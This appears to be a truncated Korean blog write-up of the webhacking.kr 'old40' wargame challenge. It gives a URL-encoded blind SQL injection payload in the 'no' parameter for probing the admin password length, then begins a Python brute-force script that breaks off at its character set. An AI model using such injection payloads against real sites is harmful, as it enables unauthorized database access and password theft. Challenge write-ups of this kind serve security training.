webhacking.kr - old40

초반에 문제 페이지를 들어가면 아래와 같은 화면이 있습니다. 기본적인 sqli입니다. no 부분에서 sqli가 터지는 것을 확인할 수 있습니다. 해당 부분에서 쿼리를 줘서 password의 길이를 파악할 수 있습니다. > webhacking.kr/challenge/web-29/?no=0%7C%7Cid%3D0x61646d696e%26%26length%28pw%29%3E0&id=guest&pw=guest Challenge 40 webhacking.kr 하나하나 해보면 pw의 길이는 총 10 이라는 것을 알 수 있고, 아래 코드를 돌림으로써 모든 password를 획득할 수 있습니다. import requests result = "" string = "abcdefghijklmnopqrstuvwxyz123456..

2021.04.17